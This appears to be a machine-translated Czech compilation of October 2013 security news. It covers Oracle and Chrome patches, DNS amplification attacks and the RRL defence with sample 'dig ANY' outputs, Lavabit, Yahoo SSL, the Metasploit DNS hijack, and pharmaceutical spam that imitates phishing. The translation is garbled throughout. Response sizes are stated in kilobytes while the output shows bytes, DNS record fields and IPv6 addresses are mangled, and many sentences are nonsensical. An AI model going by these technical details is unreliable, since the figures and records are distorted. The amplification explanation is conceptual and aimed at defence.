Oracle také vydal tucet záplaty pro své řady Sun produktu, včetně chyby v modulu Sun SPARC správu serveru, které by mohly poskytnout útočníkovi přístup k řadě důležitých funkcí pro správu.
Zbývající opravy chyby řeší bezpečnost v produktu Oracle Enterprise Manager Grid Control, řada podnikových aplikací Oracle, včetně dodavatelského řetězce, PeopleSoft, Siebel a iLearning, průmysl, finanční a Primavera Apps.
Použití RRL zabránit DNS Amplification útoky
16.10.2013 Počítačový útok | Hacking
Jeden běžně používaný způsob Distributed Denial of Service (DDoS) útok je zesílení DNS útok. DNS Amplification využívá bez státní příslušnosti povahy DNS dotazů na vytvoření padělaných požadavky DNS prostřednictvím otevřených rekurzivních DNS serverů a směruje tyto žádosti k cíli útoku DDoS.
Pokud je poslední věta zdála kompletní blábol, to by mohlo pomoci dána příklad. Hactivist rozhodne, že má zášť proti svému rychlého občerstvení firmy clon, stačí pouze nabídnout své dýně Milkshake 2 měsíce v roce. Tento hacker ovládá botnet s 5000 uzly, které mohou zahájit 100 Mbit útok proti své webové stránky. To není dost, aby se vaše webové stránky, takže se nemusíte starat o to. Ale naše určena hactivist udělal svůj domácí úkol a identifikuje tisíce otevřených překladače. Otevřené resolver cache DNS server, který umožňuje komukoliv, aby se dotazy (pokud máte jeden byste opravdu měli zakázat).
Po identifikaci otevřené resolvery útočník pokyn její botnet poslat kované DNS dotazy na otevřené překladače s IP adresou vašeho webserveru jako kované původní šetření. Tak, teď, místo 100 Mbit útoku můžete být hit s 10 Gigabit trvalého útoku. Jak to funguje? Vytvořením velké odpovědi DNS. Zatímco útočník DNS dotazy jsou menší než 512k odpovědi může být podstatně větší. Například, pokud si poslat jakýkoliv dotaz společnosti Microsoft získáte 832k odpověď:
-Sh-3.2 $ dig microsoft.com ANY
; Zkrácený, opakování v režimu TCP.
; << >> Dig 9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1 << >> microsoft.com ANY
; Globální možnosti: printcmd
; Dostal odpověď:
; - >> HEADER << - opcode: QUERY, status: NOERROR, id: 42610
; Vlajky: qr aa rd žádost: 1, odpověď: 11, AUTHORITY: 5, DODATEČNÉ: 10
; OTÁZKA sekce:
; Microsoft.com. V každém
; ODPOVĚĎ sekce:
microsoft.com. 3600 IN TXT "v = spf1 patří: _SPF-a.microsoft.com patří: _SPF-b.microsoft.com patří: _SPF-c.microsoft.com patří: _SPF-SSG-a.microsoft.com patří: SPF- . hotmail.com IP4: 131.107.115.215 IP4: 131.107.115.214 IP4: 205.248.106.64 IP4: 205.248.106.30 IP4: 205.248.106.32 ~ all "
microsoft.com. 3600 IN TXT "FbUF6DbkE + Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ =="
microsoft.com. 3600 IN MX 10 mail.messaging.microsoft.com.
microsoft.com. 3600 IN SOA ns1.msft.net. msnhst.microsoft.com. 2013081506 300 600 2419 200 3600
microsoft.com. 3600 IN A 65.55.58.201
microsoft.com. 3600 IN A 64.4.11.37
microsoft.com. 172799 IN NS ns1.msft.net.
microsoft.com. 172799 IN NS ns4.msft.net.
microsoft.com. 172799 IN NS ns2.msft.net.
microsoft.com. 172799 IN NS ns3.msft.net.
microsoft.com. 172799 IN NS ns5.msft.net.
; AUTHORITY sekce:
microsoft.com. 172799 IN NS ns5.msft.net.
microsoft.com. 172799 IN NS ns4.msft.net.
microsoft.com. 172799 IN NS ns1.msft.net.
microsoft.com. 172799 IN NS ns2.msft.net.
microsoft.com. 172799 IN NS ns3.msft.net.
; DALŠÍ SEKCE:
ns1.msft.net. 3599 IN A 65.55.37.62
ns1.msft.net. 3599 IN AAAA 2a01: 111:2005 :: 01:01
ns2.msft.net. 3599 IN A 64.4.59.173
ns2.msft.net. 3599 IN AAAA 2a01: 111:2006:6 :: 01:01
ns3.msft.net. 3599 IN A 213.199.180.53
ns3.msft.net. 3599 IN AAAA 2a01: 111:2020 :: 01:01
ns4.msft.net. 3599 IN A 207.46.75.254
ns4.msft.net. 3599 IN AAAA 2404: f800: 2003 :: 01:01
ns5.msft.net. 3599 IN A 65.55.226.140
ns5.msft.net. 3599 IN AAAA 2a01: 111:200 f: 1 :: 01:01
; Dotaz: 1 ms
; SERVER: 199.58.210.9 # 53 (199.58.210.9)
; KDY: Pátek 16 srpen 2013 17:12:53
; MSG SIZE rcvd: 893
Spuštění jakýkoliv dotaz proti DHS.GOV vrací 4453K odpověď:
-Sh-3.2 $ dig dhs.gov ANY
; Zkrácený, opakování v režimu TCP.
; << >> Dig 9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1 << >> dhs.gov ANY
; Globální možnosti: printcmd
; Dostal odpověď:
; - >> HEADER << - opcode: QUERY, status: NOERROR, id: 7097
; Vlajky: qr aa rd žádost: 1, odpověď: 35, AUTHORITY: 8, DODATEČNÉ: 7
; OTÁZKA sekce:
; Dhs.gov. V každém
; ODPOVĚĎ sekce:
dhs.gov. 900 V RRSIG TYPE51 8 2 900 20130824205017 20130814202047 35505 dhs.gov. HfARElBQz4seqIK0tXXq6SdESpsMpr3jOgmok9AZ0DPbGT3sjtGzZnrg yB + sTF5WeMCS2l85BvtIjdTqWUIt9R80VMBKGEKlN6max/vqQ8h09wqk q5rHod78qXVrqLM7QeN7Bo2BW5/wGpo1b/lMoJJ38xm8dob/WU7uDS7 / / M4 =
dhs.gov. 900 V RRSIG TYPE51 8 2 900 20130824205017 20130814202047 50970 dhs.gov. mL2E0vW6pY + g0w3qN7qEnDiCJpu2B1JoG/MMSog73CSPSJIddOy11XI3 n4i99oCH7mxW3zltMxjxGfo2RtF0Cw/y1JH3lzbIWqTSIO5bh5bKeTn2 iCv0192xImxa7jh4olQhKPUbxdiVryc3fgAx6pVtSmmkKPpZXefXfyzT Xe4 =
dhs.gov. 900 V TYPE51 \ # 11 0100000A06D74C53E10A09
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 6340 dhs.gov. phDh5VIA3LQMhxVyYSkh5zNjIRXrmut + ltLANu08vHzs5baK/NmW2I46 / / tjPWlxxRb/a7Uq6lrDV6vwdM9CH0nsTurPsX + gSBi1QA95wHAhC8et hFYHkMfKxpaZH8LOWyYANrs1Q1D8rqYoxIBle/kpB2Jx3hvh939j3 / / e n7zzVXAraumzxWvQSySueFxTzQWmRdFTSGPYhfw0HkJvax59HXEoBLqP C1Lfdps4pN8TNz6OiR7QRAh8dQNyqutWEErI6I2OaoErFrbZEHIadkMq ncEZ5McU2oV3LcfTlvdeCNR4w64SL0M0cq01JVJvsyvL12iFHTkIRAMe fQmTug ==
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 35505 dhs.gov. r/nZTNnJwYa0OijRKkRrpAcWjYGUnclIDa/zgV0IF1jeDm3acztxXyW3 HwmyZqqdF6i0kOsHOCQDaLTALow0OD8n0pJnICHji4L7PMYbo8HII8AG xpvsrGa2RcowKJmWfukoXUzxFDVvJF3eou + ObJBdpXPW1kBeFSDY4Ud / 0yg =
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 50970 dhs.gov. UNDgPSVIg2iHJI3Up26xYfNF2S2Z6cxvKY79btL7W5iJ41jdm9XQl5g3 1uk/v/jL5 + + O9FipHy9e/th8 QpT8js3namWRvomZMbV2Auhl7u8bkw6T 6UYMwCzo5mM2n9aRKL6CIp6E5iZqUITqMwcx8NOYXiHo/bo9vCaaON/V 7C4 =
dhs.gov. 432000 IN RRSIG DNSKEY 8 2 432000 20130824204826 20130814202545 55984 dhs.gov. dhQxhmXXejyIrZ2dk8T3phdJg2jQGvnEaibKeV3Q + kAB10rw7PiL03S0 F5Fg5MicoH3g8GLj4TfcF1AUOkwNJmY9/UmnqXOr1KeYLqWPvtBckSMO 6VG9S6flI/STH0w0aJ6HuOfbdX0/QmmYYf841sGpeERiWbqD/56/Z5KO A7b8Q4vW87HkLktveakHiRsUOQse0PGZ08R9CeLuWKyzGhNS2pO6Vebi 7h2NNMaMMJMmBgbOdc7RsGFJstkTQfICvOJateGkx5V161v/YpSs2iAk hFQk/VCIFqGcQI0jhBVTkF7 + FE0N6S 1 E5LXVGj4vKsgwbXYiCQZ + Hbd u6N + iQ ==
dhs.gov. 432000 IN DNSKEY 256 3 8 AwEAAdr5ZcOawyjc0khJmGCs3zuAXF9dkMIvbO/Td9hCNeRt4GDnfBCR IVnv9DPjMk1N8659bNxnu23n5c2lQWkqRoV9kg3f0GA + Ebw4oFbug0KI 32785v1DIl4i + + TGrPp7u64PIbablgilzkmH2NXH qLJLyzfm3A8fUW56 Nu2bjF67
dhs.gov. 432000 IN DNSKEY 257 3 8 AwEAAdCPBJACeS7 + jhZV2p76YkyjtnL/395HFQLGoZhCSTmcjFbxZc4Y ZP9428VwE6ZjSi0m0UhWPqtRIpgIHP0mbWGfVz/OLDiI4bt3sHYmNjT1 bY9xxkUQEbfSTIaWgW7U6q7QjPVJ3lH3suT0kC70snNdWmWLkIbo74P4 SbxCXIzBYU + D/hfhC3pyFl63U8JFlWTBOi1hNmh0dXycUlRTkkxFv4V2 3okFI1 + kpFZFZ5O + + IJNzhuLPYpabFkpm5p0PvKN9 RZE/kKacrb372i7 NXQeU0LFEUmBBFHbOX5wI8pwEo1pXVwGVTgbmDX/QikbKvjMBiEHEz1M pccFjQ3qfis =
dhs.gov. 432000 IN DNSKEY 257 3 8 AwEAAe2TaoLtHepWJ4MrICWbyzuipCC2Rit/F3ngUyTFF/tcmZfSjv7j DzACk78iG91unXqqZefS + + wqYoNBahITzuduzax j5QEPE9l2O4OyldT / lhPIcFmxe5n + H7BFuElwbRqmq1CF/Gq6auNaAlDTQSw35EQpJVrMw5o3 oXQtC + Fs7zDzvrMY + + I4Kd87Mg5aAp83c/Ju6QiRGMb5l3maLg ofbdTN KAYVEfPPqUxlYjpa + UDyjuEB1EeKcnpw4H02PHPZNN1k6GCTjkkjUvqS T + EEtpb / nWdJUf + t2xqnY6TzUgMtrAD2ryV8x2keSdShCNKp9QAjRmHB n5CBN15htQc =
dhs.gov. 432000 IN DNSKEY 256 3 8 AwEAAdqX4Bc6MQUoLVLjg5ZdPiJvRzgAfw1h3Rjdm8c67E8h0uegaeJC jR1piVN/yXIAksqMOsd4ExtQCcbAmc1p + yDdL/VIr9B8FDpCply3J/z5 7x2NMDqrtNwgrxmwETEvQtdUHVDs/bq6ntbuiedO4RM9D2smgOCfamf / kll4nKCj
dhs.gov. 28800 IN MX RRSIG 8 2 28800 20130825164115 20130815163139 35505 dhs.gov. hx8ipwMvRF2Rzi7E3HGVMPEffuq4W + U3Y8Dhw0kJ 3 vNpDCikWPbPcCh kQKVvJyIEwdcbubkedIul8bcO5/STnAyN + l61qGT/AOhFvTCBSVr7evf F0zdVU2W2DbSnivF3BR5GAjqm6lXL/mowiCjRq7KcCaofwWnlZujmwQS oso =
dhs.gov. 28800 IN MX RRSIG 8 2 28800 20130825164115 20130815163139 50970 dhs.gov. XdgjtPV4 11 HJVNkSSzblg/6rKaou7gmaCm3 + NW1aUhRM/eA9a0v/RUd 2KcznCghAPu4jcePMqs 4 BoqQbGVF5C7CZvZBizXQNBwOvM1i8iJlmJy R/GrnEX8w8uQ4CQyP5zqLcDCgpZhso/r7cSoF2wy6vH + mvSj2Um7UASv T5Y =
dhs.gov. 28800 IN MX 10 mail.us.messaging.microsoft.com.
dhs.gov. 28800 IN SOA RRSIG 8 2 28800 20130826103555 20130816093555 35505 dhs.gov. yYbMLFPwR1TvX4sR8 + + DXNB8m25rKuH6ULZtnh4dBiVcHc5fwflTXIHqR KLOM77uPV0g2O4tLDxHZeCCxCO5qRlGPy1HMA6jxsM121xZyV6L8GcU egTr/G6G51GA0gK0/For8rScN33pPSn1f + 1 F5GkFORPIIwgq + qqBhnh ACU =
dhs.gov. 28800 IN SOA RRSIG 8 2 28800 20130826103555 20130816093555 50970 dhs.gov. Es4oH8nJVt9IrM64FAeW6wmzNGvTUQpEFttwKOaCU1jicX70fkkWp8xM 3jJ90KBdaYV8wc5SYqnm3Dvdv0N6h6Zp7V + zZgAWYtxG0L25q05jmcZ7 KrVNVegupNSFRjlXx/I4bGjXDMGSUwCVvUJOxrDIdKDSqtl8ljjnfVjC Nx0 =
dhs.gov. 28800 IN SOA ns5.dhs.gov. dnssec1net.cbp.dhs.gov. 2008084610 10800 1080 604800 900
dhs.gov. 28800 IN NS RRSIG 8 2 28800 20130826103306 20130816093540 35505 dhs.gov. b4j8L1J8E4esATBT2naapjrSzAU1nYDfvI6GYCsMuLJf/dgI/s1tRnpA PZprb6Ia0XapPya8bFunq2oA0MNCmL1fYsvH05tSiSadRkdR765aFfV1 qEsa9UPK96uzYFuAen16tD4XjtaVpVBhKbnWW/eFMX4E9Ue1R8YAm4aj IKA =
dhs.gov. 28800 IN NS RRSIG 8 2 28800 20130826103306 20130816093540 50970 dhs.gov. NDN1xTmjgBvlwZsdUhzUgbAfsKqJsqoxjcKDV9msPt/W1MpTnRYpHAvu gGODPKD8P7/hkxMsO2nHkvTp0G0fz3et5lLfXLMpJLwu + s / fbKNl 9 Lh QxAFGa1PbyLh5R/etvxS3kqr6XJqZOWxEFaEuKsv8Q1qu3fNi3J/CAYB gqg =
dhs.gov. 900 V RRSIG A 8 2 900 20130826020707 20130816011426 35505 dhs.gov. yt + pKyKjeLs5KCiMXPIPXbjHKzXwmZ2aZAAjAZeSdiGitZJBioIrIDER ozRW5H1o4Bt1RL3b3CS4fSBb8A8Ip5iqXKISWlKkCnbzag/Qwokf3ao9 e3pi41sRgjiPyYojCh4 + + xvgC5GUP5YxXI iqdpSp7nyoJGHPQ7K4mwXY INW =
dhs.gov. 900 V RRSIG A 8 2 900 20130826020707 20130816011426 50970 dhs.gov. itIc6xp9Bi0JNqMRFwJKwTUzWdEOJM9JfKRima/pHzebqytyYoHjgWdO eJsbx0CpOunBJv1mbQMA5kD19JrriTIkryrgNuotHswJFWsLC6RqiVMj qE1c/LfZqflOsEpI6Bd4VdhWHe7A96lPxjaK5rTTxUsP2AjpIYrmRki0 1Q8 =
dhs.gov. 900 IN A 173.252.133.166
dhs.gov. 3600 IN RRSIG DS 7 2 3600 20130821100026 20130816100026 58219 gov. KZTyE5CWJARJiY/h2O0y6mH1BzwsuDQUMyzlM3TNA/50iMs9zE1LQhZw kViqgHttxZr + + Ct23FdwStfamCMP9KVCCau2gs xW/6P764GWnzyqcy9R 1KohrdxySvsozG + + + VbiCbkSKZ7 CO8trJHRVFyInC5y4W + vKavpv/m6Q 49RW8VBMUDpPXVxA3ZqaXMrV8A0jSEbMvf 9 Xuzd2KBL7awuL + clIvd4 atcxywlToOrG99VPj9zataYkdB/buYmEI9vT7MW/wYKJOPDdvmMxeLUX g15R8c6CqW45837oGIzV6sPmC9RIMH4sE35q9WVcNY + iO3KV5FhWWLrO qW8c7Q ==
dhs.gov. 3600 IN DS 6340 8 2 28CE7678822B31AA9CCCBF1B27F795BE02BE1355AB6C892C35D11C68 758F75FB
dhs.gov. 3600 IN DS 55984 8 1 79494AAC6BA3A4C1A7749E48443D7150477DEE6E
dhs.gov. 3600 IN DS 55984 8 2 5C3A89A0E66C52C15CE4FA578CB5AF390A42A706B02E9F8105558539 F8216C7B
dhs.gov. 3600 IN DS 6340 8 1 FF3933AE3D8FD8C4DF64A203F72B86B668AC3677
dhs.gov. 28800 IN NS use3.akam.net.
dhs.gov. 28800 IN NS usc2.akam.net.
dhs.gov. 28800 IN NS asia2.akam.net.
dhs.gov. 28800 IN NS usw3.akam.net.
dhs.gov. 28800 IN NS eur2.akam.net.
dhs.gov. 28800 IN NS use1.akam.net.
dhs.gov. 28800 IN NS usw4.akam.net.
dhs.gov. 28800 IN NS asia3.akam.net.
; AUTHORITY sekce:
dhs.gov. 28800 IN NS asia3.akam.net.
dhs.gov. 28800 IN NS usc2.akam.net.
dhs.gov. 28800 IN NS usw4.akam.net.
dhs.gov. 28800 IN NS eur2.akam.net.
dhs.gov. 28800 IN NS use3.akam.net.
dhs.gov. 28800 IN NS usw3.akam.net.
dhs.gov. 28800 IN NS use1.akam.net.
dhs.gov. 28800 IN NS asia2.akam.net.
; DALŠÍ SEKCE:
eur2.akam.net. 58651 IN A 2.16.40.64
usc2.akam.net. 90000 IN A 69.31.59.199
use1.akam.net. 86294 IN A 72.246.46.2
use3.akam.net. 90000 IN A 204.2.179.179
usw3.akam.net. 90000 IN A 69.31.59.199
asia2.akam.net. 67094 IN A 195.10.36.47
asia3.akam.net. 12225 IN A 222.122.64.134
; Doba: 2 ms
; SERVER: 199.58.210.9 # 53 (199.58.210.9)
; KDY: Pátek 16 srpen 2013 17:20:58
; MSG SIZE rcvd: 4453
Jak můžete vidět, kováním správné dotaz útočník může způsobit značné škody proti hostiteli, a to i s poměrně skromným botnetu. Další výhodou útoku amplifikační DNS je to, že je prakticky nezjistitelné. Útoky Zdá se, že pochází z DNS serverů po celém internetu, které jsou s největší pravděpodobností nebude přihlášení požadavky - takže tam není ani stopa zpět do botnetu členy, natož náš koktejl milující hacker.
Nejprve navrhoval Paul vixie a Vernon Schryver v dubnu 2012 DNS Hodnotit Réponse Omezení (RRL) je metoda pro zabránění ukládání do mezipaměti serveru byla využívána v útoku Amplification DNS udržuje informace o typech dotazů, které byly provedeny. Takže to nemění povahu DNS namísto samotný server udržuje sleduje typy a počty provedených dotazů a omezuje počet odpovědí, že se vrátí. Doporučuji čtení plnou technickou poznámku pro všechny detaily, ale to scvrkává, že v BIND správce může nyní vytvářet omezení založených na oblastech, jako jsou odpovědí za sekundu, chyby za sekundu, netblocks, na které odpovědi jsou odesílány a další. RRL schopnost je implmented v BIND 9.9.4, doufejme, že ostatní DNS implementace následovat.
ISC , organizace, která udržuje BIND zdrojový kód nabízí bezplatný webinář o tom, jak implementovat DNS rll dne Středa 21 srpen, pokud se chcete dozvědět více o této schopnosti.
Lavabit uživatelé mohou získat přístup k účtům a načítání dat
16.10.2013 Bezpečnost
Lavabit je Ladar Levison oznámila, že uživatelé jeho nedávno zavřel e-mailovou službu budou moci krátce přístup k jejich účty, aby mohli získat své e-maily a šechny údaje, které ztratil v odstávce.
Chtít uklidnit ty uživatele, kteří se domnívají, že informace o jejich účtu může být ohrožena, Levison nabídl jim možnost měnící své heslo. Mohou tak již činí, ale okno využívající tuto možnost trvá až tři dny, a začalo na 19:00 USA času Central v pondělí. "Pokud uživatelé jsou opravdu znepokojen tím, že informace o jejich účtu byl napaden, to umožní jim změnit své heslo k účtu na webové stránky s nově zabezpečené SSL klíče, "řekl vysvětlil . Nezmínil se o tom, jak dlouho účty budou přístupné pro uživatele, ale je nepravděpodobné, že bude dlouhá, takže pokud jste Lavabit zákazník, připravte se dostat dovnitř, uchopit a dostat se rychle. Můžete začít s heslem se měnící proces zde . Poté, co tak učiníte, download funkce k dispozici pro vás od pátku 18.října v devatenáct hodin CT.
CipherCloud přináší vyhledávat silné šifrování
16.10.2013 Zabezpečení
CipherCloud vydal techniky ke zlepšení vyhledávání, použitelnost a bezpečnost cloudových dat chráněných pomocí AES 256-bit šifrování.
Toto řešení také umožňuje organizacím v souladu s vládními nařízeními a odvětvovými mandátů včetně -. GLBA, PCI, HIPAA a HITECH, EU Data Protection Act, UK ICO poradenství, australský soukromí novela a US State Ochrana zákony CipherCloud poskytuje ochranu organizace strukturované a nestrukturované informace v populární cloud aplikací, včetně - salesforce.com, truhlík, Microsoft Office 365, Google Gmail, Amazon Web Services a mnoho dalších. Navíc CipherCloud pro každou aplikaci a CipherCloud pro databáze umožňují organizacím rozšířit ochranu dat na stovky třetí strany mrakem a soukromých cloudových aplikací a databází. "Shoda citlivých dat často vyžaduje použití šifrování, pokud je odeslána přes veřejné komunikační sítě, "řekl Brian Lowans, hlavní analytik společnosti Gartner. "Ve skutečnosti, mělo by to být považováno za standardní praxe pro Všechny vrstvy oblačnosti aplikací založených přístupné prostřednictvím veřejné sítě, aby se zabránilo odposlechu. CipherCloud v jižní technology využívá brány, architekturu a umožňují bezpečné lokální index a vyhledávací operace při odesílání silně zašifrovaná data do cloudu a chrání před všemi vnějšími hrozbami. Toto řešení umožňuje přirozený jazyk, divoké karty a logické domovních 256-bitové AES šifrovaných datech. Další dostupné techniky na vyhledatelnosti trhu nedostatek nebo vyžadují komplexní nasazení lokálních databází nebo se spolehnout na částečné šifrování dat.
Poslední Straně, Yahoo Zapnutí SSL ve výchozím nastavení
15.10.2013 Zabezpečení
Yahoo, jeden z posledních e-mailových protahování k provedení SSL ve výchozím nastavení, oznámil, že to bude dělat tak v lednu.
Společnost byla kritizována jako jeden z mála zbývajících společností obrovských internetových k jeho zpoždění zapnutí šifrování standardně pro jeho webových e-mailových uživatelů. To bude nyní učinit 8 lednu roku k datu, od kdy se poprvé dali uživatelům možnost používat SSL spojení pro e-mailové sezení .
Zpoždění je pozoruhodný Yahoo, což je více než tři roky za výchozí implementace Googlem SSL pro Gmail. Uživatelé Outlook.com Microsoft webmail služby měli SSL ve výchozím nastavení povolen od července 2012, zatímco Facebook dělal to výchozí letos v únoru.
Yahoo odmítl žádost o rozhovor na zpoždění, a místo toho ukázal Threatpost do online prohlášení senior viceprezident komunikačních produktů Jeffrey Bonforte.
"Naše týmy se snažíme provést nezbytné změny, aby ve výchozím nastavení připojení HTTPS na Yahoo Mail, a těšíme se na poskytování této další vrstvu zabezpečení pro všechny naše uživatele," Bonforte v prohlášení.
Yahoo rozhodnutí nabídnout SSL jako možnost letos byla zveřejněna krátce po listopadu 2012 dopis z řady zájmových skupin společně podepsali dopis generálního ředitele Marissa Mayer vyzývající ji k implementaci HTTPS implicitně volá doprava šifrování základní bezpečnostní požadavky . Skupina, ve které jsou zástupci Electronic Frontier Foundation, American odbor občanských svobod v Tibetu Action Institute, Reportéři bez hranic a mnoho dalších, jasně rozhodl nejen dát soukromí v ohrožení, ale životy.
"Bohužel, toto zpoždění dává svým uživatelům na rizika, které je znepokojující zvláště od Yahoo! Mail je široce používán v mnoha světově nejvíce politicky represivní státy. Tam byly časté zprávy o politických aktivistů a vládních kritiků jsou uvedeny kopie svých e-mailových zpráv jako důkaz během výslechů, které kladou důraz na význam poskytování základních opatření na ochranu soukromí e-mailu "v dopise.
Zpráva přichází den poté, co Washington Post informoval o novou sadu uniklých dokumentů z informátorů NSA Edward Snowdena. Nejnovější objev se týká NSA sbírku e-mailových seznamů kontaktů a seznamy kamaráda z několika instant messaging služby za účelem mapování vztahů mezi zahraničními sledování cílů a jejich on-line připojení.
Odeslat zprávu maluje snímek sběru činnosti zařízení během jediného dne, ve kterém NSA shromažďují téměř 450.000 adres Yahoo e-mail a desítky tisíc jiných služeb, jako je Hotmail, Facebook a Gmail. Post řekl, tajné dohody se zahraničními telekomunikačními společnostmi vedly k tomuto aspektu činností dozoru NSA, většina z nich se děje v zámoří, ale pravděpodobně stále pasti miliony kontaktních informací Američana.
Google opravuje tři vysoce rizikových chyby v Chrome
15.10.2013 Zranitelnosti
K dispozici je trojice s vysokým rizikem chyb zabezpečení v prohlížeči Google Chrome, které byly záplatované v nové verze prohlížeče propuštěn na úterý.
Chyby jsou všechny use-after-bez chyby, a Google zaplatil celkem 5.000 dolarů odměny pro výzkumné pracovníky, kteří objevili a nahlásili. Google také řekl, že tam bylo několik bezpečnostních problémů nalezené interní firemní bezpečnostní tým, který není obvykle vypuknout na jednotlivé nedostatky.
Nová verze Chrome je trochu atypické propuštění Google. Společnost aktualizuje prohlížeč poměrně často, ale mnoho z vydání zahrnují větší počet bezpečnostních chyb než verze 30.0.1599.101 která byla dnes zveřejněna. Úplný seznam chyb opravených v této verzi jsou:
[$ 1000] [ 292422 ] High CVE-2013-2925: Použijte po zpětném zdarma v XHR. Úvěry atte Kettunen z OUSPG .
[$ 2000] [ 294456 ] High CVE-2013 až 2926: Použijte po zpětném zdarma v editaci. Úvěr cloudfuzzer .
[$ 2000] [ 297478 ] High CVE-2013-2927: Využití po volném formulářů. Úvěr cloudfuzzer .
Uživatelé by měli aktualizovat své prohlížečů co nejdříve, aby se zabránilo útokům proti těmto chybám zabezpečení.
Tajemník v Metasploit DNS únos Ne podvedeni faxem
15.10.2013 Hacking | Zabezpečení
Registrátor pro Metasploit a Rapid7 webové stránky, z nichž oba stali obětí únosu DNS útok v pátek, nebyl podvedeni podvodného změnu žádosti zaslané faxem, neboť se původně psalo.
Místo toho, zaměstnanec Register.com pravděpodobně padl za oběť na sociální inženýrství podvod, který vyústil ve ztrátu zaměstnance legitimní pověření, které byly použity, aby infiltroval registrátora a manipulovat nastavení DNS pro obě místa.
Domovské stránky pro Metasploit a Rapid7 ukázal na stránkách údajně patřící k pro-palestinského hacker kolektivní jít podle jména KDMS. Skupina unesl stránky a návštěvníci byli uvítáni s poznámkou, prohlašovat odpovědnosti za útoky a podobné DNS únosy prováděné s jinými bezpečnostními společnostmi.
Rapid7 mluvčí řekl, že Register.com aktualizováno dnes firma s tím, že původní zpráva byla neúmyslně sdělí Register.com.
"Čekáme obdržet zprávu od Register.com a my přesně nevíme, kdy budeme si to (i když samozřejmě doufáme, že na to co nejdříve)," Rapid7 uvedl v prohlášení zaslaném Threatpost . "Jakmile budeme mít informace, budeme naprosto sdílet to, co můžeme pomoci vzdělávat ostatní, aby mohli chránit před stejnými hrozbami."
Rapid7 šéf bezpečnosti a Metasploit tvůrce HD Moore řekl přes proud tweetů v pátek ráno, že DNS únos byl rychle vyřešen a varoval ostatní pracující s Register.com kontrolovat jejich příslušné DNS záznamy, protože skupina prohlašovat, že odpovědnost by měli schopnost přesměrování Je-li doména s tímto registrátora.
Útok na Register.com završen rušný týden podobných útoků proti registrátorů. KDMS prohlásil odpovědnost za útok proti Network Solutions, velký sídlem v USA registrátor domén a poskytovatel hostingu. Řada bezpečnostních agentur práce s Network Solutions utrpěl podobné DNS únosy a musel provoz přesměrován na KDMS kontrolované domény.
Podobný útok byl proveden proti LEASEWEB, ačkoli to bylo původně oznámeno, že registrátor byl ohrožen prostřednictvím zneužití chyby zabezpečení v prostředí klient WHMCS a fakturační software používaný společností. To bylo rychle vyvráceno LEASEWEB v prohlášení na svých internetových stránkách; LEASEWEB řekl, že útočníci získat doménové heslo správce a použít pověření pro přístup k registrátora.
WHMCS chyba, která byla oprava byla zneužita k útoku na čisté VPN. Útočníci byli schopni dosáhnout poskytovatele VPN uživatelské databáze a rozeslat hromadný email, který řekl, že podání bylo třeba vypnout a někteří zákazníci mohli brzy ozvete činných v trestním řízení.
"Další a důkladný audit na naší VPN systémů potvrdila, že tam není absolutně žádná porušení v síti VPN a po incidentu naše služby VPN nadále provozovat bezpečně," PureVPN spoluzakladatel Uzair Gadit napsal v e-mailu pro zákazníky. "Žádné technické údaje o používání byla ohrožena, a protože jsme neskladujte aktivitě uživatelů protokoly jsou naši uživatelé se tímto jisti, plné anonymity a bezpečnosti po celou dobu."
Farmaceutické "phishing"
15.10.2013 Phishing
Inzeráty na léky na zlepšení mužské sexuální apetit je jádro spam pošty. Stejně jako všechny ostatní nevyžádaných zpráv, e-maily tohoto typu se vyvinuly v čase a dnešní verze již obsahují pouze sliby enahnced účinnosti a odkaz na web prodejní prášky. V srpnu a září jsme zaznamenali sérii poštovních zásilek, které používaly názvy známých firem, které vypadaly stejně jako typických phishingových zpráv. Nicméně, místo phishing odkazy, které vedly obsažené na inzerát pro "mužské" léků.
Všechny zprávy ve zásilky byly provedeny vypadají, jako by přišli z FedEx, Google, Twitter, Yahoo a dalších oblíbených firem a služeb. Jeden z těchto názvů se obvykle používá v "Z" pole zprávy. Text tělo ve zprávách napodobil oficiální dopisy od společností, včetně loga a podpisy z fiktivní zaměstnanců. Bylo to všechno znamená přesvědčit příjemce, že e-maily byly skutečné. Ale pozorný uživatel by snadno zjistíte z adresy odesílatele, že to bylo něco, ale skutečné, a byl pravděpodobně generovány automaticky. Tam bylo několik variant zprávy v rámci hromadnou korespondenci.
Spammeři používají řadu záminkami dostat uživatele ke kliknutí na odkazy. Například, některé e-maily, napodoboval legitimní zprávy o nedoručených e-mailů, profil registraci, mazání nepřečtených e-mailů, atd. Tyto zprávy byly záměrně velmi krátká, pobízet příjemce kliknout na odkaz, aby se dozvědět více informací. Ale ve skutečnosti odkaz přesměrován na reklamní stránky pro farmaceutický spam.
Další varianty zahrnuty připomínky ohledně nové zprávy nebo oznámení. Přijatý datum bylo uvedeno v těle zprávy, zatímco pole "Zobrazení zpráv", který je skrytý odkaz, který vedl na inzerát, pro muže pilulky.
V některých zásilek spammeři také používají různé barevné vzory - jasné barvy za odkazy a názvy společností. Předmětem e-maily byly docela standardní věty o přijetí zprávy, je potřeba aktivovat účet a tak dále.
Na začátku srpna jsme zjistili další hromadné korespondence podobné těm, které je popsáno výše, ale na mnohem vyšší úroveň. Zpráva, která byla napsána na účet Google, nebo přesněji řečeno, že vypadá jako automatizované oznámení od službu s názvem Google Message Center. Adresa odesílatele je pravděpodobně umístěn v doméně google.com, a většina uživatelů by mohla být snadno odpuštěno si mysleli, že je to skutečné adresy spojené s firmou Google. Zpráva z nebezpečného odesílatele oznámení příjemce o novém e-mailu, který údajně poslal na jeho / její adresu, a za předpokladu, odkaz. Ve snaze přelstít spamové filtry spammeři změnil kódování několika písmen vazeb na ASCII. Například písmeno "s" se stal číslem 73. Spammeři také používal službu Google Translate zamaskovat skutečný vztah - je to oblíbený trik, který, spolu s předmětem zprávy a další "Hluk", může být velmi efektivní. Nicméně příjemce musí pouze umístit kurzor na odkaz pro jeho skutečnou povahu být odhalen.
URL rozeslal v této konference také vede na stránky, reklamní farmaceutické výrobky. Pomocí hluk spammeři mohou dělat stejné odkaz jedinečná pro každou zprávu, protože pokaždé, když různé dopisy jsou kódovány pomocí ASCII.
